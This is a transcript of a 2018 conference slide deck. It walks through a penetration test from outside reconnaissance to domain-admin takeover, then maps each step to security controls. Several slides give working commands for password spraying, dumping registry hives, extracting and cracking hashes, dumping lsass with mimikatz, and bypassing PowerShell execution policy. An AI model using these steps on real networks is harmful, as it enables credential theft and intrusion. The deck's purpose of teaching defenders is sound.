Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Stealing Domain Admin (or How I Learned to Stop Worrying and Love the CSSF)

Stealing Domain Admin (or How I Learned to Stop Worrying and Love the CSSF)

With global information security spending rapidly approaching $100 billion, you'd think we,d have a pretty good handle on preventing data breaches by now. However, considering that nearly 1 billion records have been exposed in the 5000+ data breaches publicly disclosed since 2005, you,re probably asking yourself the same question as security and risk management professionals all over the world: How does this keep happening? This presentation will walk you through a penetration tester,s process, step-by-step, as the tester goes from unauthorized outsider to domain admin (without being detected). More importantly, we,ll discuss the fundamental security controls that will shut down attackers time and again.

Fe9f52860b1f3b28797a9754e9788c3f?s=128

slandail

March 07, 2018
Tweet

Transcript

  1. STEALING DOMAIN ADMIN (OR HOW I LEARNED TO STOP WORRYING

    AND LOVE THE CSSF) JEROD BRENNEN
  2. WHO AM I?  Jerod Brennen  Security Solutions Architect,

    One Identity  Alphabet Soup  ACE, CISSP, GWAPT, GWEB
  3. THE CHALLENGE

  4. HANDBASKETS, ANYONE?

  5. LET’S PLAY FIND THE WHITESPACE From http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

  6. BROKEN RECORD… BROKEN RECORD… BROKEN RECORD…

  7. CHOOSE YOUR OWN ADVENTURE

  8. PEN TEST FLOW

  9. TEN EIGHT STEP PROGRAM  Step 1: Gather OSINT 

    Step 2: Score Some Creds  Step 3: Logon to an Internal System  Step 4: Dump SAM/System/Security Hives  Step 5: Extract Hashes and Get Cracking  Step 6: Identify Admin Accounts  Step 7: Find Active DA Logins  Step 8: Pass the Hash
  10. STEP 1: GATHER OSINT (OPEN SOURCE INTELLIGENCE)  Google search

     site:company_website.com “contact”  Maltego  https://www.paterva.com/  Transform: To Email Address [using Search Engine]  LinkedIn company search  Data.com Connect  https://connect.data.com/  EmailHarvester  https://github.com/maldevel/EmailHarvester  Discover (Lee Baird)  https://github.com/leebaird/discover
  11. STEP 2: SCORE SOME CREDS  Brute Force Attack 

    Lots of usernames, lots of passwords  Password Spray Attack  Lots of usernames, VERY few passwords  ./ntlm-botherer.py –U ./users.txt –p Winter2018 –d target_domain.com https://webdir2a.online.lync.com/Autodiscover/AutodiscoverService.svc/root/oauth /user?originalDomain=target_domain.com/WebTicket/WebTicketService.svc  Burp Suite Intruder / Cluster Bomb  https://portswigger.net/burp/help/intruder_using.html  https://portswigger.net/burp/help/intruder_positions.html  MailSniper  https://github.com/dafthack/MailSniper
  12. STEP 3: LOGON TO AN INTERNAL SYSTEM  Passive Intel

     Shodan - https://shodan.io/  Censys - https://censys.io/  Search Engines  site:company.com inurl:login  site:company.com sitemap.xml  Active Intel  nmap -Pn -sS xxx.xxx.xxx.0/24 -p 21- 23,80,443,3389,5800,5900,8443  Remote Administration Tools  Bomgar, GoToMeeting, TeamViewer, Join.me, Splashtop, LogMeIn, WebEx  Physical/Wireless Network Access
  13. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES  Dump the hives 

    reg.exe save hklm\sam c:\sam.save  reg.exe save hklm\system c:\system.save  reg.exe save hklm\security c:\security.save  This one may require elevated privileges  If so, psexec.exe -i -s cmd.exe, then execute within new command prompt window  While you’re there, scope out users & groups  net user /domain > domain_users.txt  net groups /domain > domain_groups.txt  Exfiltrate  Box, Dropbox, Google Drive, OneDrive, ShareFile
  14. STEP 5: EXTRACT HASHES AND GET CRACKING  Extract hashes

    with Impacket (offline)  https://github.com/CoreSecurity/impacket  secretsdump.py -sam sam.save -security security.save -system system.save LOCAL  Crack SAM hashes  LM -> Ophcrack  NT -> hashcat or John the Ripper  HashKiller  https://hashkiller.co.uk/ntlm-decrypter.aspx  Crack domain creds  hashcat or John the Ripper
  15. STEP 6: IDENTIFY ADMIN ACCOUNTS  Impacket output  Administrator

    = RID -500 (“the dash 500 account”)  Verify Local Admins  net localgroup administrators  Dump Active Directory  AD Users and Computers  Apache Directory Studio  Softerra LDAP Administrator/Browser  LDAP Admin (portable?)
  16. STEP 7: FIND ACTIVE DA LOGINS  PowerShell Empire 

    https://github.com/PowerShellMafia/PowerSploit  https://github.com/PowerShellMafia/PowerSploit/tree/m aster/Recon  Invoke-UserHunter  Input options  Individual username  List of usernames  Domain group  List of hosts  PowerShell ProTip  powershell -exec bypass
  17. STEP 8: PASS THE HASH  Invoke-TheHash  https://github.com/Kevin-Robertson/Invoke-TheHash 

    Dump lsass (Local Security Authority Subsystem Service)  Start > Run > taskmgr.exe  Show processes from all users  lsass.exe > Right Click > Dump  c:\Users\username\AppData\Local\Temp\lsass.DMP  Grab passwords from lsass  Online -> procdump.exe  https://technet.microsoft.com/en- us/sysinternals/dd996900.aspx  Offline -> mimikatz  https://github.com/gentilkiwi/mimikatz
  18. STEP 9: CELEBRATE (OPTIONAL)

  19. NOTHING NEW UNDER THE SUN  Dumping Windows Credentials (December

    20, 2013)  https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/  I Hunt Sys Admins (January 19, 2015)  http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/  Password Spraying Outlook Web Access (February 17, 2016)  http://www.blackhillsinfosec.com/?p=4694
  20. WHAT IF I TOLD YOU…

  21. SIMPLICITY IS KEY

  22. COMMON SENSE SECURITY FRAMEWORK  Seven (7) Areas of Protection

     Protect Your Applications  Protect Your Endpoints  Protect Your Network  Protect Your Servers  Protect Your Data  Protect Your Locations  Protect Your People  Three (3) Yes/No Questions per Area  Guidance (free, open source, commercial) https://commonsenseframework.org/
  23. WHO DOESN’T LOVE SPREADSHEETS?

  24. WHO DOESN’T LOVE GRAPHS?

  25. EVERY BREATH YOU TAKE… EVERY MOVE YOU MAKE… Step Control

    Gather OSINT S01 - Do you follow documented system hardening procedures to secure your servers? Score Some Creds D02 - Do you periodically review employee account security to ensure that access is appropriate (i.e., least privilege, individuals accounts, strong passwords)? Logon to an Internal System N03 - Do you require two factor authentication for remote/VPN access, as well as access to third party (hosted) applications? Dump SAM/System/Security Hives S02 - Do you centrally store and actively monitor critical security logs for suspicious events (such as abnormal admin account activity)? Extract Hashes and Get Cracking See S02 Identify Admin Accounts E02 - Do you limit local administrator account usage? Find Active DA Logins See S02 Pass the Hash See S02
  26. UNSUNG HERO

  27. A FEW FINAL COMMENTS

  28. LEADERSHIP NEEDS CONTEXT  Information Security Spending Will Top $101

    Billion By 2020  http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178  World's Biggest Data Breaches  http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/  Privacy Rights Clearinghouse's Chronology of Data Breaches  https://www.privacyrights.org/data-breaches  Verizon Data Breach Investigations Report (DBIR)  http://www.verizonenterprise.com/verizon-insights-lab/dbir/
  29. YOUR HOMEWORK  Self-assess your organization against the CSSF 

    Schedule a red team / blue team exercise using these steps as a guide  Post mortem the exercise  Update policies, procedures, and standards based on the post mortem  Site down with leadership (steering committee) and share what you learned  Fix all the things!
  30. QUESTIONS / COMMENTS / DISCUSSION

  31. CONTACT INFO  Email – jerod.brennen@oneidentity.com  LinkedIn - https://www.linkedin.com/in/slandail/

     Twitter - https://twitter.com/slandail  GitHub - https://github.com/slandail  SlideShare - https://www.slideshare.net/JerodBrennenCISSP  Speaker Deck - https://speakerdeck.com/slandail/